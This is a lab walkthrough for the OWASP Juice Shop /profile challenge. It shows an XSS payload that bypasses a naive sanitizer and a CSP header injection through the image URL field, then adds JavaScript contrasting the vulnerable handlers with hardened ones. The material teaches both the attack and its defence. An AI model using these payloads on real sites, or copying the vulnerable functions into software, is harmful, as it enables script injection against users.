Navigate to https://localhost:88 or https://demo.owasp-juice.shop.
Log in with a Juice Shop account.
A forced-browsing wordlist, a nikto scan, or a similar scan reveals the /profile path. Navigate to it manually.
Enter the following value in the Username field:
<script>alert(`xss`)</script>
The input is sanitized, but the sanitizer is naive.
Enter the following in the Username field:
<<a|ascript>alert(`xss`)</script>
Set the Image URL field to https://placekitten.com/300/300.
Note that the Content-Security-Policy header on the response contains an entry like:
/assets/public/images/uploads/22.jpg; script-src 'self' 'unsafe-eval' https://code.getmdl.io http://ajax.googleapis.com
Submit http://not.an.image/image.png as the Image URL and view the response header:
http://not.an.image/image.png; script-src 'self' 'unsafe-eval' https://code.getmdl.io http://ajax.googleapis.com
Now submit the following text as the Image URL:
http://not.an.image/image.png script-src 'unsafe-inline' 'self' 'unsafe-eval' https://code.getmdl.io http://ajax.googleapis.com
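The walkthrough above relies on two weaknesses in the /profile handler: a sanitizer that strips markup in a single pass, and a Content-Security-Policy header assembled by string concatenation from the stored image URL. The following is an added example, not Juice Shop's own code, that models both weaknesses next to their hardened counterparts. The regex, the header layout (img-src first, then a fixed script-src), and the function names are assumptions for illustration; the inputs are the values used on this page.

```javascript
// Added example (not Juice Shop's code): naive vs. hardened handling of the
// two user-controlled values that reach the /profile page.

const STATIC_SCRIPT_SRC =
  "script-src 'self' 'unsafe-eval' https://code.getmdl.io http://ajax.googleapis.com";

// Naive sanitizer (assumed shape): one pass that deletes "<tag" openers.
// Deleting the inner "<a|a" from "<<a|ascript>" leaves a well-formed
// "<script>" behind, which is why the second username on the page survives.
function naiveSanitize(input) {
  return input.replace(/<(?:\w+)\W+?\w/gi, '');
}

// Hardened: do not try to strip markup; encode for the HTML text context so
// the browser renders the characters instead of parsing them as tags.
function escapeHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '`': '&#96;' };
  return input.replace(/[&<>"'`]/g, (ch) => map[ch]);
}

// Vulnerable builder (assumed layout): the raw image URL is spliced into the
// header, so any ';' or whitespace in it is interpreted as CSP syntax.
function buildCspVulnerable(imageUrl) {
  return `img-src 'self' ${imageUrl}; ${STATIC_SCRIPT_SRC}`;
}

// Hardened builder: reject anything that is not a plain http(s) URL and emit
// only its origin. Returns null when the value must not reach the header.
function buildCspSafe(imageUrl) {
  if (/[\s;,]/.test(imageUrl)) return null; // CSP separators never belong in a URL
  let parsed;
  try {
    parsed = new URL(imageUrl);
  } catch {
    return null;
  }
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return null;
  return `img-src 'self' ${parsed.origin}; ${STATIC_SCRIPT_SRC}`;
}

// Defender-side check on an emitted policy: does its script-src directive
// permit inline script? Browsers honour the first directive of a given name.
function scriptSrcAllowsInline(header) {
  for (const directive of header.split(';')) {
    const [name, ...values] = directive.trim().split(/\s+/);
    if (name === 'script-src') return values.includes("'unsafe-inline'");
  }
  return false;
}

// Walk the page's inputs through both versions.
const username = '<<a|ascript>alert(`xss`)</script>';
const injected =
  "http://not.an.image/image.png script-src 'unsafe-inline' 'self' 'unsafe-eval' https://code.getmdl.io http://ajax.googleapis.com";

console.log(naiveSanitize(username)); // <script>alert(`xss`)</script>
console.log(escapeHtml(username));    // rendered as text, not parsed
console.log(buildCspVulnerable(injected)); // attacker text lands verbatim in the header
console.log(buildCspSafe(injected));       // null: rejected before it reaches the header
console.log(buildCspSafe('https://placekitten.com/300/300'));
```

Stripping is the wrong tool for the username: output encoding leaves nothing for a second pass to uncover. For the image URL the point is that the header must never carry user-supplied bytes at all; whitelisting the origin of a parsed URL keeps the policy free of separators, and scriptSrcAllowsInline is the kind of assertion a test suite can run against every response the profile route produces.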